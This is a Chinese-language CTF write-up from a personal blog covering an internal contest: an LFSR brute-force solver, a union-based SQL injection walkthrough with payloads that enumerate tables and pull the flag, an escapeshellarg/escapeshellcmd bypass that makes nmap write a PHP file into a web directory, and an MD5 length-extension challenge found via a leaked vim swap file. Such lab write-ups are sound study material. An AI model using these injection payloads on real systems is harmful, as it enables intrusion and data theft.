V0W's Blog

SKCTF2

字数统计: 1,133阅读时长: 6 min
2018/04/21 Share

SKCTF 组内CTF2


NOT GET Score

Crypto-Streamgame1

这道题,我想到暴力求解,但是无奈脚本写错,加上之前做不出来的焦躁,没做出来,很难受。。。

分析

给出了加密过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from flag import flag
assert flag.startswith("flag{")
assert flag.endswith("}")
assert len(flag)==25

def lfsr(R,mask):
output = (R << 1) & 0xffffff
i=(R&mask)&0xffffff
lastbit=0
while i!=0:
lastbit^=(i&1)
i=i>>1
output^=lastbit
return (output,lastbit)

R=int(flag[5:-1],2) #将flag明文转换成对应的二进制
mask = 0b1010011000100011100 #mask

f=open("key","ab") #ab,二进制方式打开追加
for i in range(12):
tmp=0
for j in range(8):
(R,out)=lfsr(R,mask) #其实根本不用管加密过程
tmp=(tmp << 1)^out
f.write(chr(tmp))
f.close()

我们需要模拟加密过程,因为明文是19位,每位都是0或1,所以,模拟过程,最多只需要2**19次模拟。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
def lfsr(R,mask):
output = (R << 1) & 0xffffff
i=(R&mask)&0xffffff
lastbit=0
while i!=0:
lastbit^=(i&1)
i=i>>1
output^=lastbit
return (output,lastbit)
mask = 0b1010011000100011100

f=open("key","rb")
c=f.read() #二进制读取key
f.close()
count = -1

while count <= 2**19:
count += 1
#print(count)
R = count
for i in range(12):
tmp=0
for j in range(8):
(R,out)=lfsr(R,mask)
tmp=(tmp << 1)^out
if tmp != c[i]: #模拟过程比较得到的加密结果每一个字符是否相等
break
if i == 11:
print('flag{%s}' % bin(count)[2:])
exit(0)

flag{1110101100001101011}

web-SQLinjection

事后看这道题感觉其实挺简单的,我想复杂了,看到源码知道验证码其实就是md5碰撞得到的。但是我以为验证码会持续变化==、就先把这道题给放了。
今天给我最大的收获就是会写md5碰撞的脚本(好几个题都和这个有关==、)
getmd5

1
2
3
4
5
6
7
8
9
10
11
12
13
import hashlib

def getmd5(code):
for i in range(9999):
temp = hashlib.md5(str(i)).hexdigest()
if temp[0:4] == code:
return i
print getmd5('084a')

#-1' union select 1,2,database()#
#-1' union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where table_schema='security' #
#-1' union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where table_schema='security' && table_name='f1ag'#
#-1' union select 1,2,group_concat(id,'|',flagg) from f1ag #

SQL手注
-1' union select 1,2,3 #
2,3回显,1没回显(共三列)

-1' union select 1,2,database()#
security

1
-1' union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where table_schema='security' #

Your Login name:2
Your Password:emails,f1ag,referers,uagents,users

1
-1' union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where table_schema='security' && table_name='f1ag'#

Your Login name:2
Your Password:id,flagg

1
-1' union select 1,2,group_concat(id,'|',flagg) from f1ag #

Your Login name:2
Your Password:1|skctf{SQL_injection_md5}

web-nmap

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
include("flag.php");
if(!isset($_GET['host'])){
highlight_file(__FILE__);
}else{
$host =(string)$_GET['host'];
$host=escapeshellarg($host); #作出过滤但是可以绕过
$host=escapeshellcmd($host); #逃逸出'
$sandbox = md5("box".$_SERVER['REMOTE_ADDR']);
echo "you are in sandbox: ".$sandbox."<br/>";
@mkdir($sandbox);
chdir($sandbox);
echo "<pre>";
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
echo "</pre>";
}
?>

测试代码:

1
2
3
4
5
6
7
8
9
10
11
12
<?php
$host = "' <?php phpinfo();?> -oN shell.php '";
$host = (string)$host;
echo "host:".$host;
echo "</br>"."\n";
$arg = escapeshellarg($host);
echo "arg:".$arg;
echo "</br>"."\n";
$cmd = escapeshellcmd($arg);
echo "cmd:".$cmd;
echo "</br>"."\n";
?>

对于单个单引号, escapeshellarg()函数转义后,还会在左右各加一个单引号,但escapeshellcmd()函数是直接加一个
转义符。
对于成对的单引号, escapeshellcmd()函数默认不转义,但escapeshellarg()函数转义。
host参数先经过escapeshellarg()再经过escapeshellcmd()就会出现问题。
escapeshellarg 先转义了一个单引号,然后引入了一对单引号, escapeshellcmd 不会转义成对的单引号,但是会转义
转移符\,这样, 转移符作用失效,逃逸出来一个单引号。

可以看到最后一行有\\,导致转移符失效,单引号逃逸。
mark

payload: ?host=’ <?php phpinfo();?> -oN shell.php ‘
访问沙盒的文件夹即可看到自己写入的文件。

参考链接
https://paper.seebug.org/164/#0-tsina-1-56231-397232819ff9a47a7b7e80a40613cfe1

web-md5扩展攻击

vim临时文件导致源码泄露,http://192.168.211.105:8001/.index.php.swp

得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$flag = "xxxxxxxx";
$secret = "xxxxxxxxxxxxxxxxxxxxxxxxx"; // This secret is 15 characters long for security!
$username = $_POST["username"];
$password = $_POST["password"];
if (!empty($_COOKIE["getmein"])) {
if (urldecode($username) === "admin" && urldecode($password) != "admin") {
if ($_COOKIE["getmein"] == md5($secret . urldecode($username . $password))) {
echo "Congratulations! You are a registered user.\n";
die ("The flag is ". $flag);
}
else {
die ("Your cookies don't match up! STOP HACKING THIS SITE.");
}
}
else {
die ("You are not an admin! LEAVE.");
}
}
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 *
7));
echo "<h1>hello ctfer!<h1>";

题目要求 sample-hasn=MD5($secret."adminadmin")

CATALOG
  1. 1. SKCTF 组内CTF2
  2. 2. NOT GET Score
    1. 2.1. Crypto-Streamgame1
    2. 2.2. 分析
    3. 2.3. web-SQLinjection
  3. 3. web-nmap
    1. 3.1. web-md5扩展攻击